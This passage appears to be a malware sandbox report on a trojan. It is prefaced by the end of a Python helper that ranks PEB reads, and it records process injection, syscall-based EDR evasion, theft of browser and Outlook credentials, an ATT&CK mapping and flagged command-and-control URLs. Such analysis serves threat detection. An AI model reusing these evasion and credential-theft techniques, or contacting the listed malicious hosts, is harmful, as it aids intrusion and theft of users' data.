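Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]2_2_02F68A90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h]2_2_03004B00
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] (13x)
Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083A364 SetUnhandledExceptionFilter,1_2_0083A364
""".strip().splitlines()


def parse_peb_reads(lines):
    """Return {process: {function id: Counter({register: reads})}}; other lines are skipped."""
    reads = defaultdict(lambda: defaultdict(Counter))
    for line in lines:
        m = PEB_READ_RE.search(line)
        if m:
            reads[m["proc"]][m["fn"]][m["reg"]] += int(m["n"] or 1)
    return reads


def summarize(lines):
    """Per process: functions ranked by PEB reads, the total, and the address
    window the functions occupy (shows whether they cluster in one region)."""
    out = {}
    for proc, fns in parse_peb_reads(lines).items():
        rows = [
            {"function": fn, "address": int(fn.rsplit("_", 1)[1], 16),
             "reads": sum(regs.values()), "registers": dict(regs)}
            for fn, regs in fns.items()
        ]
        rows.sort(key=lambda r: (-r["reads"], r["address"]))
        addrs = [r["address"] for r in rows]
        out[proc] = {"functions": rows,
                     "total_reads": sum(r["reads"] for r in rows),
                     "address_window": (min(addrs), max(addrs))}
    return out


def demo():
    """Summary of the embedded sample."""
    return summarize(SAMPLE_LINES)


if __name__ == "__main__":
    s = demo()[SVCHOST]
    lo, hi = s["address_window"]
    print(f"{len(s['functions'])} functions, {s['total_reads']} PEB reads, window 0x{lo:08X}-0x{hi:08X}")
    for r in s["functions"]:
        print(f"  {r['function']}: {r['reads']:3d} via {','.join(sorted(r['registers']))}")
```

Run it over the full report section to rank the functions; a function with a dozen PEB reads (2_2_02F429A0 has thirteen) is usually a loop over PEB-reachable structures rather than a single debugger check, which is where to start in the disassembly.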

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtOpenKeyEx: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtQueryValueKey: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\convert.exe  Section loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: read write
            Source: C:\Windows\SysWOW64\convert.exe  Section loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\convert.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\convert.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\convert.exe  Thread register set: target process: 1088
            Source: C:\Windows\SysWOW64\convert.exe  Thread APC queued: target process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 33D008
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_00868C93 LogonUserW
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_00813B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_00814A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_00874EC9 mouse_event
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe  Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
            Source: C:\Windows\SysWOW64\convert.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_008681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_00874C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: hkLFB22XxS.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: hkLFB22XxS.exe, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083886B cpuid 1_2_0083886B
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_008450D7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00852230 GetUserNameW,1_2_00852230
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0084418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_0084418A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00814AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00814AFE

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\convert.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\convert.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: hkLFB22XxS.exe | Binary or memory string: WIN_81
            Source: hkLFB22XxS.exe | Binary or memory string: WIN_XP
            Source: hkLFB22XxS.exe | Binary or memory string: WIN_XPe
            Source: hkLFB22XxS.exe | Binary or memory string: WIN_VISTA
            Source: hkLFB22XxS.exe | Binary or memory string: WIN_7
            Source: hkLFB22XxS.exe | Binary or memory string: WIN_8
            Source: hkLFB22XxS.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00886596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00886596
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe | Code function: 1_2_00886A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00886A5A

            MITRE ATT&CK Matrix

            Techniques are listed by tactic column; a number in parentheses is the signature count shown next to a matched technique, as extracted.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1466070 | Sample: hkLFB22XxS.exe | Start date: 02/07/2024 | Architecture: WINDOWS | Score: 100

            Start
              DNS/IP: www.d99qtpkvavjj.xyz; www.cloudsoda.xyz (Performs DNS queries to domains with low reputation); 21 other IPs or domains
              Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
              started: hkLFB22XxS.exe (4)
            hkLFB22XxS.exe (4)
              Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
              started: svchost.exe
            svchost.exe
              Signatures: Maps a DLL or memory area into another process
              injected: YcTurzUREEPNDwUlDlxzRT.exe
            YcTurzUREEPNDwUlDlxzRT.exe (injected by svchost.exe)
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              started: convert.exe (13)
            convert.exe (13)
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              injected: YcTurzUREEPNDwUlDlxzRT.exe
              started: firefox.exe
            YcTurzUREEPNDwUlDlxzRT.exe (injected by convert.exe)
              DNS/IP: www.firmshow.top 203.161.43.228, ports 49727, 49728, 49729, VNPT-AS-VNVNPTCorpVN Malaysia; autonomyai.xyz 15.197.142.173, ports 49744, 49745, 49746, TANDEMUS United States; 8 other IPs or domains
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)

            Source | Detection | Scanner | Label | Link
            hkLFB22XxS.exe | 68% | ReversingLabs | Win32.Trojan.Leonem
            hkLFB22XxS.exe | 100% | Joe Sandbox ML
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.rebornqababy.ru/waey/100%Avira URL Cloudmalware
            http://www.cavetta.org.mt/yhnb/0%Avira URL Cloudsafe
            http://www.autonomyai.xyz/b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP100%Avira URL Cloudmalware
            http://www.erosonline.com.br/2lcx/100%Avira URL Cloudmalware
            http://www.faxinguxn6.cn/ofk1/0%Avira URL Cloudsafe
            https://login.live.c0%Avira URL Cloudsafe
            http://www.autonomyai.xyz/b2v9/100%Avira URL Cloudmalware
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.jl884.vip/r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.theridleysuk.co.uk/frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP0%Avira URL Cloudsafe
            http://www.firmshow.top/02nb/0%Avira URL Cloudsafe
            http://www.hereboy.co.uk/4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP0%Avira URL Cloudsafe
            http://www.jl800.vip/g67v/0%Avira URL Cloudsafe
            http://www.bulletinnest.com/r7gq/100%Avira URL Cloudmalware
            http://www.hereboy.co.uk/4ez3/0%Avira URL Cloudsafe
            http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da00%Avira URL Cloudsafe
